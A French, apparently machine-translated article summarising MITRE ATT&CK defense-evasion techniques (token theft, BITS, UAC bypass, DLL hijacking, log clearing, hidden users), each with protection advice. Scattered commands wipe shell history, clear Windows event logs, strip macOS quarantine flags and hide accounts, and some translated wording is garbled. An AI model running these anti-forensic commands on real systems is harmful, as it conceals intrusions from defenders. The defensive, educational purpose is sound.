Liens vers toutes les parties:Partie 1. Obtention de l'accès initial (accès initial)Partie 2. ExécutionPartie 3. Fixation (persistance)Partie 4. Escalade de privilègesPartie 5. Évasion de la défensePartie 6. Obtention des informations d'identification (accès aux informations d'identification)Partie 7. DécouvertePartie 8. Mouvement latéralPartie 9. Collecte de données (collecte)Partie 10 ExfiltrationPartie 11. Commandement et contrôleLa section «Contournement de la protection» décrit les techniques par lesquelles un attaquant peut masquer une activité malveillante et empêcher sa détection par des outils de protection. Différentes variantes de techniques d'autres sections de la chaîne d'attaque qui aident à surmonter des défenses spécifiques et des mesures préventives prises par le côté défenseur sont incluses dans les techniques de contournement de la défense. À leur tour, les techniques de contournement de la défense sont appliquées à toutes les phases d'une attaque.
L'auteur n'est pas responsable des conséquences possibles de l'application des informations énoncées dans l'article, et s'excuse également pour d'éventuelles inexactitudes faites dans certaines formulations et termes. Les informations publiées sont une nouvelle version gratuite du contenu de MITRE ATT & CK .Système: Windows
Droits: utilisateur, administrateur
Description: les attaquants peuvent utiliser des jetons d'accès pour effectuer des actions dans divers contextes de sécurité des utilisateurs ou du système, évitant ainsi la détection d'activités malveillantes. Un adversaire peut utiliser les fonctions de l'API Windows pour copier des jetons d'accès à partir de processus existants (vol de jeton), pour cela, il doit être dans le contexte d'un utilisateur privilégié (par exemple, un administrateur). Le vol de jetons d'accès est généralement utilisé pour élever les privilèges de l'administrateur au système. Un adversaire peut également utiliser un jeton d'accès au compte pour l'authentification sur un système distant, si ce compte dispose des autorisations nécessaires sur le système distant. Il existe trois façons principales d'abuser des jetons d'accès.
Vol et usurpation d'identité de jetons.L'emprunt d'identité de jetons est la capacité du système d'exploitation à démarrer des threads dans un contexte de sécurité autre que le contexte du processus auquel ce thread appartient. En d'autres termes, la personnification des jetons vous permet d'effectuer toutes les actions au nom d'un autre utilisateur. Un adversaire peut dupliquer un jeton d'accès à l'aide de la fonction
DuplicateTokenEX et utiliser
ImpersonateLoggedOnUser pour appeler un thread dans le contexte d'un utilisateur connecté, ou utiliser
SetThreadToken pour affecter un jeton d'accès à un flux.
Créez un processus à l'aide d'un jeton d'accès.Un attaquant peut créer un jeton d'accès à l'aide de la fonction
DuplicateTokenEX puis l'utiliser avec
CreateProcessWithTokenW pour créer un nouveau processus qui s'exécute dans le contexte de l'utilisateur emprunté.
Obtention et usurpation d'identité de jetons d'accès.Un adversaire, disposant d'un nom d'utilisateur et d'un mot de passe, peut créer une session de connexion à l'aide de la fonction API
LogonUser , qui renverra une copie du jeton d'accès à la session d'une nouvelle session, puis, à l'aide de la
fonction SetThreadToken , affectera le jeton reçu au flux.
Metasploit Meterpreter et
CobaltStrike disposent d'outils pour manipuler les jetons d'accès afin d'élever les privilèges.
Recommandations de protection: Afin d'utiliser pleinement les tactiques ci-dessus, un attaquant doit avoir les droits d'administrateur système, alors n'oubliez pas de limiter les privilèges des utilisateurs ordinaires. Tout utilisateur peut tromper les jetons d'accès s'il possède des informations d'identification légitimes. Limitez la possibilité pour les utilisateurs et les groupes de créer des jetons d'accès:
GPO: Configuration ordinateur> [Stratégies]> Paramètres Windows> Paramètres de sécurité> Stratégies locales> Attribution des droits utilisateur: créez un objet jeton .
Déterminez également qui peut remplacer les jetons de processus des services locaux ou réseau:
GPO: Configuration ordinateur> [Stratégies]> Paramètres Windows> Paramètres de sécurité> Stratégies locales> Attribution des droits utilisateur: remplacez un jeton de niveau de processus.Système: Windows
Droits: utilisateur, administrateur, système
Description: Le service de transfert intelligent en arrière-plan Windows (BITS) est un mécanisme de transfert asynchrone de fichiers via le modèle COM (Component Object Model) en utilisant une faible bande passante. BITS est généralement utilisé par les mises à jour, les messageries instantanées et d'autres applications qui préfèrent travailler en arrière-plan sans interrompre le fonctionnement des autres applications réseau. Les tâches de transfert de fichiers sont représentées comme des tâches BITS qui contiennent une file d'attente d'une ou plusieurs opérations sur les fichiers. L'interface de création et de gestion des tâches BITS est disponible dans l'outil PowerShell et BITSAdmin. Les attaquants peuvent utiliser BITS pour télécharger, lancer, puis nettoyer après avoir exécuté du code malveillant. Les tâches BITS sont stockées de manière autonome dans la base de données BITS, tandis que le système ne crée pas de nouveaux fichiers ou entrées de registre, souvent BITS est autorisé par le pare-feu. Avec l'aide des tâches BITS, vous pouvez prendre pied dans le système en créant de longues tâches (par défaut 90 jours) ou en appelant un programme arbitraire après la fin d'une tâche ou d'une erreur BITS (y compris après le redémarrage du système d'exploitation).
Recommandations de protection: BITS est une fonctionnalité standard du système d'exploitation, dont l'utilisation est difficile à distinguer des activités malveillantes.Le vecteur de protection doit donc viser à empêcher le lancement d'outils malveillants au début de la chaîne d'attaque. La désactivation complète de BITS peut arrêter les mises à jour logicielles légitimes, cependant, vous pouvez envisager de restreindre l'accès à l'interface BITS à des utilisateurs et groupes d'accès spécifiques, et vous pouvez également limiter la durée de vie des tâches BITS, qui est définie en modifiant les clés suivantes:
- HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ JobInactivityTimeout;
- HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ MaxDownloadTime .
Système: Windows, Linux, macOS
Description: certaines fonctions de sécurité analysent les fichiers en recherchant des signatures statiques. Les opposants peuvent ajouter des données à des fichiers malveillants afin d'augmenter leur taille à une valeur dépassant la taille maximale autorisée du fichier numérisé ou modifier le hachage du fichier pour contourner la liste noire de blocage du lancement de fichiers par des hachages.
Recommandations de protection: identifiez les logiciels potentiellement dangereux en appliquant des outils tels que
AppLocker , des outils de mise en liste blanche et des politiques de restriction logicielle.
Système: Windows
Droits: utilisateur, administrateur
Description: Il existe de nombreuses façons de contourner l'UAC, dont les plus courantes sont implémentées dans le projet
UACMe . De nouvelles façons de contourner l'UAC sont régulièrement découvertes, telles que l'utilisation abusive de l'application système
eventvwr.exe , qui peut exécuter un fichier binaire ou un script élevé. Les programmes malveillants peuvent également être intégrés dans des processus approuvés par lesquels l'UAC permet une élévation de privilèges sans inviter un utilisateur.
Pour contourner l'UAC à l'aide de eventvwr.exe, la clé est modifiée dans le registre Windows:
[HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .
Pour contourner l'UAC à l'aide de sdclt.exe, les clés du registre Windows sont modifiées:
[HKEY_CURRENT_USER] \ Software \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe;
[HKEY_CURRENT_USER] \ Software \ Classes \ exefile \ shell \ runas \ command \ isolatedCommand.Recommandations de protection: supprimez les utilisateurs du groupe d'administrateurs locaux sur les systèmes protégés. Si possible, activez le niveau de protection le plus élevé dans les paramètres UAC.
Système: Windows
Droits: utilisateur
Description: Microsoft Connection Manager Profile Installer (cmstp.exe) est l'utilitaire "Connection Manager Profile Installer" intégré à Windows. Cmstp.exe peut prendre un fichier inf comme paramètre, donc un attaquant pourrait préparer un INF malveillant spécial pour télécharger et exécuter des DLL ou des scriptlets (* .sct) à partir de serveurs distants contournant AppLocker et d'autres verrous, car cmstp.exe est signé avec un certificat numérique Microsoft.
Recommandations de protection: bloquer le lancement d'applications potentiellement dangereuses. La surveillance ou le blocage complet des
lancements C: \ Windows \ System32 \ cmstp.exe .
Système: Linux, macOS
Droits: utilisateur
Description: Pour la commodité des utilisateurs sur les systèmes macOS et Linux, toutes les commandes exécutées par l'utilisateur dans le terminal sont enregistrées. Les utilisateurs peuvent exécuter rapidement une commande qu'ils avaient précédemment exécutée dans une autre session. Lorsqu'un utilisateur se connecte au système, l'historique des commandes est enregistré dans le fichier spécifié dans la variable HISTFILE. Lorsque l'utilisateur se déconnecte, l'historique des commandes est enregistré dans le répertoire personnel de l'utilisateur ~ / .bash_history. Le fichier d'historique des commandes peut également contenir des mots de passe saisis par l'utilisateur en texte clair. Les attaquants peuvent à la fois rechercher des mots de passe dans les fichiers d'historique des commandes et prendre des mesures pour empêcher leur activité malveillante d'être écrite dans l'historique des commandes, par exemple:
unset HISTFILE;
export HISTFILESIZE = 0;
histoire -c;
rm ~ / .bash_history.Recommandations de protection: empêcher les utilisateurs de supprimer ou d'écrire des fichiers bash_history peut empêcher un adversaire d'abuser de ces fichiers; en outre, restreindre les droits des utilisateurs à modifier les variables HISTFILE et HISTFILESIZE préservera le journal d'exécution des commandes.
Système: Windows, macOS
Description: La signature numérique du code fournit une authentification du développeur et une garantie que le fichier n'a pas été modifié. Néanmoins, comme vous le savez, les opposants peuvent utiliser des signatures pour déguiser des logiciels malveillants en fichiers binaires légitimes. Les certificats de signature numérique peuvent être créés, falsifiés ou volés par un attaquant. La signature de code pour la vérification du logiciel au premier démarrage est utilisée sous Windows, macOS, OS X et n'est pas utilisée sous Linux en raison de la structure décentralisée de la plate-forme. Les certificats de signature de code peuvent être utilisés pour contourner les politiques de sécurité qui nécessitent que seul le code signé soit exécuté sur le système.
Recommandations de protection: L'utilisation de «listes blanches» du logiciel et la sélection d'éditeurs de logiciels fiables avant de vérifier la signature numérique peuvent empêcher l'exécution de code malveillant ou non fiable dans le système protégé.
Système: Windows
Droits: Système
Description: Certains cybercriminels peuvent utiliser des outils sophistiqués pour compromettre les composants informatiques et y installer des micrologiciels malveillants, qui exécuteront du code malveillant en dehors du système d'exploitation ou même du micrologiciel du système principal (Bios). La technique consiste à flasher des composants informatiques qui n'ont pas de système de contrôle d'intégrité intégré, par exemple des disques durs. Un appareil doté d'un micrologiciel malveillant peut fournir un accès constant au système attaqué malgré les pannes et l'écrasement du disque dur. La technique est conçue pour surmonter la protection logicielle et le contrôle d'intégrité.
Système: Windows
Droits: utilisateur
Description: Microsoft Component Object Model (COM) est une technologie permettant de créer des logiciels basés sur les composants en interaction d'un objet, chacun pouvant être utilisé simultanément dans de nombreux programmes. Les attaquants peuvent utiliser COM pour injecter du code malveillant qui peut être exécuté au lieu d'un code légitime en capturant des liens COM et des liens. Pour intercepter un objet COM, vous devez remplacer le lien vers un composant système légitime dans le registre Windows. Un autre appel à ce composant exécutera du code malveillant.
Recommandations de protection: les mesures préventives pour empêcher cette attaque ne sont pas recommandées, car les objets COM font partie du système d'exploitation et sont installés dans le logiciel système. Le blocage des modifications apportées aux objets COM peut affecter la stabilité du système d'exploitation et des logiciels. Le vecteur de protection est recommandé pour bloquer les logiciels malveillants et potentiellement dangereux.
Système: Windows
Droits: utilisateur, administrateur, système
Description: la tactique consiste à utiliser les éléments du Panneau de configuration Windows par des attaquants pour exécuter des commandes arbitraires en tant que charge utile (par exemple, le virus
Reaver ). Les objets malveillants peuvent être déguisés en contrôles standard et transmis au système à l'aide de pièces jointes de phishing. Les utilitaires de visualisation et de configuration des paramètres Windows sont des fichiers exe enregistrés et des fichiers CPL des éléments du panneau de configuration Windows. Les fichiers CPL sont en fait des DLL renommés qui peuvent être exécutés des manières suivantes:
- directement Ă partir de la ligne de commande: control.exe <file.cpl> ;
- Ă l'aide des fonctions API de shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
- double-cliquez sur le fichier cpl.
Les CPL enregistrés stockés dans System32 sont automatiquement affichés dans le Panneau de configuration de Windows et ont un identifiant unique stocké dans le registre:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpaceLes informations sur les autres CPL, par exemple, le nom d'affichage et le chemin d'accès au fichier cpl, sont stockées dans les
sections Cpls et
Propriétés étendues de la section:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control PanelCertains CPL lancés via le shell sont enregistrés dans la section:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlersRecommandation de protection: restreignez le lancement et le stockage des fichiers d'éléments du panneau de configuration uniquement dans des dossiers protégés (par exemple,
C: \ Windows \ System32 ), activez le contrôle de compte d'utilisateur (UAC) et AppLocker pour empêcher les modifications non autorisées du système. Bien sûr, l'utilisation d'un logiciel antivirus.
Système: Windows
Droits: Administrateur
Description: DCShadow implique la création d'un faux contrôleur de domaine dans le réseau attaqué à l'aide duquel, en utilisant la fonctionnalité API pour interagir avec le CD attaqué, un attaquant peut modifier les données AD, y compris les modifications apportées à tout objet de domaine, informations d'identification et clés, inaperçues par les systèmes SIEM. La boîte à outils pour implémenter l'attaque fait partie de mimikatz. DCShadow peut être utilisé pour effectuer une attaque par injection SID-History et pour créer des portes dérobées pour une consolidation ultérieure dans le système.
Recommandations de protection: Étant donné que la technique DCShadow est basée sur l'utilisation abusive des fonctionnalités de conception AD, le vecteur de protection doit être dirigé pour empêcher le lancement d'outils d'attaque. Une attaque peut être détectée en analysant la réplication réseau de la réplication de CD, qui s'exécute toutes les 15 minutes, mais peut être provoquée par un attaquant en dehors du planning.
Système: Windows
Droits: utilisateur, administrateur, système
Description: La technique consiste à exploiter les vulnérabilités de l'algorithme pour trouver par les applications les fichiers DLL dont elles ont besoin pour fonctionner (
MSA2269637 ). Souvent, le répertoire de recherche de DLL est le répertoire de travail du programme. Les attaquants peuvent donc remplacer la DLL source par une DLL malveillante portant le même nom de fichier.
Des attaques à distance sur les recherches de DLL peuvent être effectuées lorsque le programme installe son répertoire actuel dans un répertoire distant, par exemple, un partage réseau. De plus, les attaquants peuvent modifier directement la méthode de recherche et de chargement des DLL en remplaçant les fichiers .manifest ou .local, qui décrivent les paramètres de recherche de DLL. Si le programme attaqué fonctionne avec un niveau de privilèges élevé, la DLL malveillante chargée par celui-ci sera également exécutée avec des droits élevés. Dans ce cas, la technique peut être utilisée pour augmenter les privilèges de l'utilisateur à l'administrateur ou au système.
Recommandations de protection: Empêchez le chargement de DLL à distance (activé par défaut dans Windows Server 2012+ et disponible avec les mises à jour pour XP + et Server 2003+). Active le mode de recherche sécurisé pour les DLL, ce qui limite les répertoires de recherche aux répertoires tels que
% SYSTEMROOT% avant d'effectuer une recherche de DLL dans le répertoire d'application actuel.
Activation du mode de recherche de DLL sécurisée:
Configuration ordinateur> [Stratégies]> Modèles d'administration> MSS (hérité): MSS: (SafeDllSearchMode) Activez le mode de recherche DLL sécurisée.Clé de registre correspondante:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SafeDLLSearchMode.Envisagez d'auditer un système protégé pour corriger les déficiences des DLL à l'aide d'outils tels que PowerUP dans PowerSploit. N'oubliez pas de bloquer les logiciels malveillants et potentiellement dangereux, ainsi que de suivre les
recommandations de Microsoft .
Système: Windows
Description: l' attaque est basée sur des vulnérabilités de la technologie d'exécution parallèle côte à côte (WinSxS ou SxS), dont l'essence est de permettre aux applications d'utiliser des versions incompatibles des mêmes composants de code. Le référentiel d'assemblage de composants se trouve dans le dossier c: \ windows \ winsxs. Chaque assembly doit être associé à un manifeste - un fichier xml contenant des informations sur les fichiers, les classes, les interfaces, les bibliothèques et d'autres éléments de l'assembly. Comme pour les techniques de détournement d'une recherche de DLL, les adversaires peuvent provoquer une application utilisateur pour charger «latéralement» une DLL malveillante, dont le chemin a été spécifié dans le fichier manifeste d'assembly.
% TEMP% \ RarSFX% \% PROFIL D'ALLUSERS% \ SXS;
% TEMP% \ RarSFX% \% PROFIL D'ALLUSERS% \ WinSxS.Recommandations de protection: mises à jour logicielles régulières, installation d'applications dans des répertoires protégés en écriture. Utilisation de sxstrace.exe pour rechercher les vulnérabilités de chargement tardif dans les fichiers manifestes.
Système: Windows
Droits: utilisateur
Description: les attaquants peuvent utiliser l'obscurcissement de fichiers et d'informations pour masquer le code malveillant et les artefacts laissés par une invasion. Pour utiliser ces fichiers, les opposants utilisent des techniques inverses pour désobfusquer / décoder des fichiers ou des informations.
De telles méthodes peuvent impliquer l'utilisation de logiciels malveillants, de divers scripts ou d'utilitaires système, par exemple, il existe une méthode connue pour utiliser l'utilitaire certutil pour décoder le fichier exécutable d'un outil d'accès à distance caché dans un fichier de certificat. Un autre exemple est l'utilisation de la commande copu / b pour collecter des fragments binaires dans une charge utile malveillante (Payload).Les fichiers de charge utile peuvent être compressés, archivés ou chiffrés pour éviter la détection. Parfois, une action de l'utilisateur peut être nécessaire pour effectuer la désobfuscation ou le déchiffrement. L'utilisateur peut avoir besoin d'entrer un mot de passe pour ouvrir un fichier ou un script compressé ou crypté avec un contenu malveillant.Recommandations de protection: Identification et blocage des utilitaires système inutiles ou des logiciels potentiellement dangereux pouvant être utilisés pour désobfusquer ou décrypter des fichiers à l'aide d'outils tels que AppLocker et des politiques de restriction logicielle.Système: Windows, Linux, macOSDescription: les attaquants peuvent désactiver diverses fonctions de sécurité, détruire les processus de journalisation des événements, les clés de registre afin que les outils de sécurité ne démarrent pas pendant une activité malveillante, ou utiliser d'autres méthodes pour interférer avec le fonctionnement des scanners de sécurité ou des rapports d'événements.Recommandations de protection: assurez-vous que les droits d'accès aux processus, au registre et aux fichiers sont correctement configurés pour empêcher une déconnexion non autorisée ou une interférence avec le fonctionnement des outils de sécurité.Système: Windows, Linux, macOSDroits: Description de l' utilisateur : Comme avec tout logiciel, les logiciels de sécurité peuvent avoir des vulnérabilités qui pourraient être exploitées par un attaquant pour les désactiver ou les contourner.Recommandations de protection: Mises à jour logicielles régulières, développement et implémentation d'un processus de gestion des vulnérabilités logicielles. L'utilisation d'applications de virtualisation et de micro-segmentation peut réduire les risques d'une éventuelle exploitation des vulnérabilités.Système: Droits Windows : Administrateur,Description du système : La technique consiste à abuser de la mémoire supplémentaire de la fenêtre Windows, la mémoire dite Extra Window (EWM). La taille EWM est de 40 octets, adaptée pour stocker un pointeur 32 bits et est souvent utilisée pour indiquer une référence aux procédures. Les programmes malveillants au cours de la chaîne d'attaque peuvent placer un pointeur vers un code malveillant dans le EWM, qui sera ensuite lancé par le processus d'application infecté.Recommandations de protection:Étant donné que les techniques d'injection EWM sont basées sur l'utilisation abusive des fonctions de développement du système d'exploitation, les efforts de protection doivent viser à empêcher le lancement de programmes malveillants et d'outils malveillants. Il est recommandé d'identifier et de bloquer les logiciels potentiellement dangereux à l'aide d'AppLocker, d'applications de liste blanche ou d'appliquer des stratégies de restriction logicielle.Système: Windows, Linux, macOSDroits: Description de l' utilisateur : Divers outils, logiciels malveillants et autres fichiers utilisés par l'adversaire peuvent laisser des traces d'activité de pirate dans le système. Les attaquants peuvent supprimer ces fichiers d'artefacts pendant une invasion pour réduire la probabilité qu'une attaque soit détectée ou les supprimer à la fin de leur opération. L'adversaire peut utiliser à la fois des outils spéciaux pour garantir la destruction des informations (par exemple, Windows Sysinternals Sdelete) et des outils intégrés au système d'exploitation, par exemple DEL et ipher.Recommandations de protection: si possible, bloquez le lancement d'utilitaires système inutiles, d'outils tiers et de logiciels potentiellement dangereux pouvant être utilisés pour détruire des fichiers.Système: Droits Windows : AdministrateurDescription: Windows peut autoriser les programmes à accéder directement aux volumes logiques. Les programmes avec accès direct peuvent lire et écrire des fichiers directement sur le disque dur, analyser la structure des données du système de fichiers. Cette méthode contourne le contrôle d'accès aux fichiers et la surveillance du système de fichiers. Des utilitaires tels que NinjaCopy permettent d'effectuer les actions ci-dessus dans PowerShell.Recommandations de protection: blocage des logiciels potentiellement dangereux.Système: macOSDroits: utilisateur, administrateurDescription:MacOS et OS X utilisent la technologie Gatekeper, qui exécute uniquement des logiciels fiables. Lors du téléchargement d'une application depuis Internet, un attribut spécial est défini dans le fichier com.apple.quarantine, ce qui indique que Gatekeeper doit demander à l'utilisateur la permission d'exécuter le fichier téléchargé. L'indicateur est défini avant d'enregistrer le fichier sur le disque, puis lorsque l'utilisateur tente d'ouvrir le fichier, le Gatekeeper vérifie l'indicateur correspondant et s'il y en a un, le système invitera l'utilisateur à confirmer le lancement et afficher l'URL à partir de laquelle le fichier a été téléchargé. Les applications téléchargées sur le système à partir d'un lecteur USB, d'un lecteur optique, d'un lecteur pour enfants ou d'un lecteur réseau ne provoqueront pas la définition de l'indicateur dans le fichier com.apple.quarantine. Certains utilitaires et fichiers qui sont entrés dans le système attaqué lors du démarrage parallèle (technique Drive-by-compromis),ne provoquent pas non plus la définition de l'indicateur pour Gatekeeper, contournant ainsi la vérification du proxy. La présence de l'indicateur de quarantaine peut être vérifiée avec la commande:xattr /path/to/MyApp.app .Le drapeau peut également être supprimé avec attr, mais cela nécessitera une escalade de privilèges:sudo xattr -r -d com.apple.quarantine /path/to/MyApp.appRecommandations de sécurité: en plus de Gatekeeper, vous devez utiliser une interdiction de démarrage d'applications qui ne sont pas téléchargées depuis Apple Store.Système: Linux, macOSDroits: UtilisateurDescription: La variable d'environnement HISTCONTROL représente une liste de paramètres pour enregistrer l'historique des commandes dans le fichier ~ / .bash_history lorsque l'utilisateur se déconnecte. Par exemple, l'option ignorespace indique qu'il n'est pas nécessaire d'enregistrer les lignes commençant par un espace, et l'option ignoredups désactivera l'enregistrement des commandes qui sont répétées dans une rangée. Sur certains systèmes Linux, l'option ignoreboth est spécifiée par défaut, ce qui implique l'inclusion des deux paramètres ci-dessus. Cela signifie que la commande ls ne sera pas enregistrée dans l'historique, contrairement à ls.HISTCONTROL n'est pas utilisé par défaut sur macOS, mais peut être configuré par l'utilisateur. Les attaquants peuvent utiliser les fonctionnalités des paramètres HISTCONTROL pour ne pas laisser de traces de leur activité simplement en insérant des espaces devant les commandes.Recommandations de sécurité: empêchez les utilisateurs de modifier la variable HISTCONTROL et assurez-vous également que HISTCONTROL est défini sur ignoredup et ne contient pas les options ignoreboth et ignorespace.Système: Windows, Linux, macOSDroits: Description de l' utilisateur : Sous Windows, les utilisateurs peuvent masquer des fichiers à l'aide de la commande attrib. Il suffit de spécifier l'attribut + h <nom de fichier> pour masquer le fichier ou "+ s" pour marquer le fichier comme système. En ajoutant le paramètre "/ S", l'utilitaire attrib appliquera les modifications de manière récursive. Sous Linux / Mac, les utilisateurs peuvent masquer des fichiers et des dossiers en spécifiant simplement un "." Au début du nom de fichier. Après cela, les fichiers et dossiers seront masqués de l'application Finder et tels que l'utilitaire ls.Sur macOS, les fichiers peuvent être marqués avec UF_HIDDEN, ce qui désactivera leur visibilité dans Finder.app, mais n'empêchera pas les fichiers cachés d'être visibles dans Terminal.app. De nombreuses applications créent des fichiers et dossiers cachés afin de ne pas encombrer l'espace de travail de l'utilisateur. Par exemple, les utilitaires SSH créent un dossier .ssh masqué qui stocke une liste d'hôtes et de clés utilisateur connus.Les attaquants peuvent utiliser la possibilité de masquer des fichiers et des dossiers afin de ne pas attirer l'attention des utilisateurs.Recommandations de protection: il est difficile d'empêcher l'utilisation de cette technique car le masquage des fichiers est une fonctionnalité standard du système d'exploitation.Système: macOSDroits: administrateur, racineDescription: Chaque compte macOS possède un ID utilisateur qui peut être spécifié lors de la création de l'utilisateur. Les propriétés /Library/Preferences/com.apple.loginwindow ont l'option Hide500Users , qui cache les ID utilisateur et 500 ci - dessous à l'écran de connexion. Ainsi, en créant un utilisateur avec un identifiant <500 et en activant Hide500Users, un attaquant peut masquer ses comptes:sudo dscl. -créer / Utilisateur / nom d'utilisateur UniqueID 401
sudo par défaut écrire /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUERecommandations de protection:Si le poste de travail se trouve dans un domaine, la stratégie de groupe peut limiter la possibilité de créer et de masquer des utilisateurs. De même, la possibilité de modifier les propriétés /Library/Preferences/com.apple.loginwindow est empêchée.Système: macOSDroits: UtilisateurDescription: Les options de lancement d'application sur macOS et OS X sont répertoriées dans les fichiers de propriétés plist. L'une des balises de ces fichiers apple.awt.UIElement inclut le masquage de l'icône de l'application Java dans le Dock. Généralement, cette balise est utilisée pour les applications s'exécutant dans la barre d'état système, mais les attaquants peuvent abuser de cette fonctionnalité et masquer les applications malveillantes.Recommandations de protection: surveillez la liste des programmes qui ont la balise apple.awt.UIElement dans les propriétés plist.Système: Droits Windows : Administrateur,Description du système : Le mécanisme IFEO (Image File Execution Options) vous permet d'exécuter un débogueur de programme au lieu d'un programme, précédemment spécifié par le développeur dans le registre:- HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Options d'exécution de fichier image / [exécutable]
- HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ [exécutable] , où [exécutable] est le binaire exécutable du débogueur.
Comme pour les injections, la valeur [exécutable] peut être utilisée abusivement en exécutant du code arbitraire pour augmenter les privilèges ou prendre pied dans le système. Les programmes malveillants peuvent utiliser IFEO pour contourner la protection en enregistrant des débogueurs qui redirigent et rejettent diverses applications système et de sécurité.Recommandations de protection: La technique décrite est basée sur l'utilisation abusive des outils de développement de système d'exploitation courants, de sorte que toute restriction peut provoquer l'instabilité de logiciels légitimes, par exemple, des applications de sécurité. Les efforts visant à empêcher l'utilisation des techniques d'injection IFEO doivent se concentrer sur les premiers stades de la chaîne d'attaque. Vous pouvez détecter une telle attaque en surveillant les processus avec Debug_process etDebug_only_this_process .Système: WindowsDescription: les attaquants peuvent essayer de bloquer divers indicateurs ou événements capturés par des outils de sécurité pour une analyse plus approfondie. Une activité malveillante peut inclure la modification de fichiers de configuration de sécurité, de clés de registre ou la redirection malveillante d'événements de télémétrie.Lorsqu'il utilise des outils d'analyse d'activité réseau, un attaquant peut bloquer le trafic associé à l'envoi de rapports au serveur de gestion de la sécurité. Cela peut être fait de plusieurs manières, par exemple, en arrêtant le processus local responsable de la transmission de la télémétrie, en créant une règle dans le pare-feu pour bloquer le trafic vers les hôtes responsables de l'agrégation des événements de sécurité.Recommandations de protection:Assurez-vous que les traceurs et les expéditeurs d'événements, les stratégies de pare-feu et les autres mécanismes associés sont protégés par les autorisations et les contrôles d'accès appropriés. Envisagez de redémarrer automatiquement la fonction de transfert d'événements de sécurité à intervalles répétés, ainsi que la possibilité d'appliquer la gestion des modifications appropriée aux règles de pare-feu et aux autres configurations du système.Système: Windows, Linux, macOSDescription:Si une application malveillante est mise en quarantaine ou bloquée d'une autre manière, l'attaquant peut déterminer la raison de la détection de son outil (indicateur), changer l'outil en supprimant l'indicateur de celui-ci et utiliser une version mise à jour du malware qui ne sera pas détectée par des moyens de protection. Un bon exemple est la détection de logiciels malveillants à l'aide d'une somme de contrôle ou d'une signature de fichier et leur mise en quarantaine avec un logiciel antivirus. Un attaquant qui détermine qu'un malware a été mis en quarantaine par un logiciel antivirus en raison de sa signature / somme de contrôle peut utiliser des techniques de packaging de logiciels ou d'autres méthodes pour modifier le fichier afin de modifier la signature ou la somme de contrôle, puis réutiliser ce malware.Recommandations de protection:L'adversaire peut avoir accès au système et savoir quelles méthodes et quels outils sont bloqués par la protection des résidents. Utilisez des méthodes avancées de configuration des fonctions de sécurité et de sûreté, explorez le processus de compromis possible du système protégé afin d'organiser le processus d'avertissement d'une éventuelle intrusion.Identifiez et bloquez les logiciels potentiellement dangereux et malveillants à l'aide d'outils de liste blanche tels que AppLocker et les politiques de restriction logicielle.La première détection d'un outil malveillant peut déclencher une alerte vers un système antivirus ou un autre outil de sécurité. De tels événements peuvent se produire sur le périmètre et peuvent être détectés à l'aide d'un système IDS, de la numérisation du courrier, etc. La détection initiale doit être considérée comme un signe du début de l'invasion, ce qui nécessite une enquête minutieuse en dehors du «lieu» de l'événement initial. Les attaquants peuvent poursuivre l'attaque, en supposant que certains événements logiciels antivirus ne feront pas l'objet d'une enquête ou que l'analyste ne pourra pas associer de manière permanente l'événement enregistré à d'autres activités se déroulant sur le réseau.Système: Windows, Linux, macOSDescription: Les attaquants peuvent supprimer ou modifier les artefacts générés dans le système attaqué, y compris les journaux et les fichiers interceptés mis en quarantaine. L'emplacement et le format des journaux peuvent varier en fonction du système d'exploitation, les journaux système sont enregistrés en tant que fichiers Windows Event ou Linux / macOS tels que /.bash_history et .var / log / *.Les actions ciblées qui interfèrent avec le fonctionnement de la collecte d'événements et les mécanismes d'avertissement qui pourraient être utilisés pour détecter une intrusion peuvent compromettre les outils de sécurité, de sorte que les événements de sécurité ne seront pas analysés. De telles actions peuvent compliquer le processus d'examen et de réponse en raison d'un manque de données sur l'incursion.Effacement des journaux des événements Windows Les journaux des événementsWindows sont un enregistrement des alertes et notifications et du fonctionnement du système. Microsoft définit l'événement comme «tout événement significatif dans un système ou un programme qui nécessite une notification aux utilisateurs ou une journalisation». Il existe trois sources d'événements système: le système, les applications et la sécurité.Adversaires effectuant des actions liées à la gestion des comptes, à la connexion à un compte, à l'accès aux services d'annuaire, etc. peut effacer le journal des événements pour masquer leurs actions.Les journaux des événements peuvent être nettoyés avec les utilitaires de console suivants:wevtutil cl system;
application wevtutil cl;
wevtutil cl security.Les journaux peuvent également être effacés à l'aide d'autres outils, tels que PowerShell.Recommandations de protection: utilisez un stockage centralisé des journaux d'événements afin qu'il ne soit pas possible d'afficher et de gérer les journaux d'événements sur la machine locale. Si possible, minimisez le délai lors du signalement des événements pour éviter le stockage à long terme des journaux sur le système local. Protégez les fichiers journaux des événements stockés localement avec les autorisations et l'authentification appropriées, limitez la capacité des adversaires à élever les privilèges. Utilisez des outils pour masquer et crypter les fichiers journaux lorsqu'ils sont stockés localement et pendant le transfert. Surveillez les journaux de l'événement 1102: «Le journal d'audit a été supprimé.»Système: Droits Windows : UtilisateurDescription: Divers utilitaires Windows peuvent être utilisés pour exécuter des commandes, éventuellement sans appeler cmd. Par exemple, Forfiles, l'assistant de compatibilité de programme (pcalua.exe), les composants du sous-système Windows pour Linux (WSL), ainsi que d'autres utilitaires, peuvent entraîner l'exécution de programmes et de commandes à partir de l'interface de ligne de commande, de la fenêtre Exécuter ou via des scripts.Les attaquants peuvent abuser des utilitaires susmentionnés afin de contourner les outils de sécurité, en particulier pour les lancements de fichiers arbitraires jusqu'à ce que leur activité soit détectée ou bloquée par divers moyens, par exemple, en utilisant des stratégies de groupe qui interdisent l'utilisation de CMD.Recommandations de protection:Identifiez et bloquez les logiciels potentiellement dangereux et malveillants à l'aide d'AppLocker et de stratégies de restriction logicielle. Ces mécanismes peuvent être 